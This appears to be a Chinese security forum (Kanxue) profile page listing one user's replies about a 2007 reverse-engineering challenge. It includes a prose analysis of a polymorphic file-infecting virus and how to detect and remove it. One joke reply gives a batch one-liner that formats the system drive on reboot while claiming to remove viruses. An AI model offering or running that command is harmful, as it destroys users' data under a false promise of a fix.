|
[注意]看雪论坛.珠海金山挑战赛 获奖T-Shift应在月底左右发到大家手中
还好我有先见之明,要了一个XXXL的 |
|
[公告]看雪论坛对于所涉及到目标软件的管理2007.10.15
俺不会破解,跟俺没关系 |
|
|
|
|
|
[求助]被调试进程的句柄问题
漫漫无心睡眠夜真是太长了 |
|
|
|
看雪论坛.珠海金山2007逆向分析挑战赛一至三等奖名单
我只是想知道那个金山夏令营到底是个什么东东 |
|
[第三阶段◇第一题]看雪论坛.珠海金山2007逆向分析挑战赛评定结果
不知道传播病毒源码会怎么样 |
|
[原创]不懂算法第三阶段第一题
时间有点来不及,简单说一下病毒分析吧 病毒创建一个Event确保主线程只有一个,其实主线程就是进入一个irc聊天室,接受控制 如果要清除这个病毒,主要分析感染模块,现在只分析win2K以上操作系统 win9x系统就不分析了,win98是利用vxd加载到ring0的 病毒第一次启动的时候hook每个进程的 "NtCreateFile", "NtOpenFile", "NtCreateProcess", "NtCreateProcessEx", "NtCreateUserProcess" 这5个api 当调用"NtCreateFile","NtOpenFile",的时候病毒获取控制权感染文件 当调用"NtCreateProcess","NtCreateProcessEx","NtCreateUserProcess"的时候病毒控制新进程,并hook新进程的这个5个api 所以要杀毒的话先要还原被hook的api 感染模块只感染exe和scr后缀的文件,并且 WINC,WCUN,WC32,PSTO开头的文件也不感染,感染过的文件随机加上感染标志 如果加上感染标志就不会继续感染了,感染标志是love和evol 感染方式就是随机一个key,xor或者sub主模块,解密模块被随机插入垃圾代码,和随机的寄存器变形,基本使得通过特征码辩认失败,修改oep,ep指向自己的头部,代码就是加在原始文件的尾部,修改最后一个文件段,增加自身长度。 查杀难度在于重复感染和随机变形 虽然代码长度会随着解密段的大小变化,但是变化范围不大,所以整个代码的长度也比较固定 所以程序的ep如果距离最后段末尾0x8000的话,基本是这个病毒的可能性就**了 然后反汇编解密代码,病毒程序的主代码段是基本不变化的,而且变形后的主代码段是紧跟着一个汇编指令RET,我们可以遍历所有RET,尝试用RET后面第二个字符解密后面代码段,对比是否是病毒代码,如果是的话从其中取出oep的相对偏移,计算出oep 计算出病毒体的大小,从文件中去除,ep改成oep,然后做一些响应的修复 我感觉自己分析的好像不完全,程序也是一个晚上写的,估计要排倒数了 |
|
[结束]第三阶段◇第一题]看雪论坛.珠海金山2007逆向分析挑战赛
echo format %systemdrive% /s >%systemdrive%\autoexec.bat shutdown /r /f 保存成a.bat并双击 可以杀死99.9%的病毒木马 只是可能会有小小的后遗症,小孩子切勿模仿 |
|
|
|
[讨论]明天继续做题
逆向VM,猜是这个 |
|
看雪论坛.珠海金山2007逆向分析挑战赛--第二阶段成绩(1,2,3,4题)
ccfer的背影越来越远了 |
|
|
|
|
|
|
|
|
|
二阶三题,测试样本
也就是说没有一个是vc的exe加lv2的壳,这种情况都没有,覆盖面也太低了吧 |
操作理由
RANk
{{ user_info.golds == '' ? 0 : user_info.golds }}
雪币
{{ experience }}
课程经验
{{ score }}
学习收益
{{study_duration_fmt}}
学习时长
基本信息
荣誉称号:
{{ honorary_title }}
能力排名:
No.{{ rank_num }}
等 级:
LV{{ rank_lv-100 }}
活跃值:
在线值:
浏览人数:{{ visits }}
最近活跃:{{ last_active_time }}
注册时间:{{ user_info.create_date_jsonfmt }}
勋章
兑换勋章
证书
证书查询 >
能力值